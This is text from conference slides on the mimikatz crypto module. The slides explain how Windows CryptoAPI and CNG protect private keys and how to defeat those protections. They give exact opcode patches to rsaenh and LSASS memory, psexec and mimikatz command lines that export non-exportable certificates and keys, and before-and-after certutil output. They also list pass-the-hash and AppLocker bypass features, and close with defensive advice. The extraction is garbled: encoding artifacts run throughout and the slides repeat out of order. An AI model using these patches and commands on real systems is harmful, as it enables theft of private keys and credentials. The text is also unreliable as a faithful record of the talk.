07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
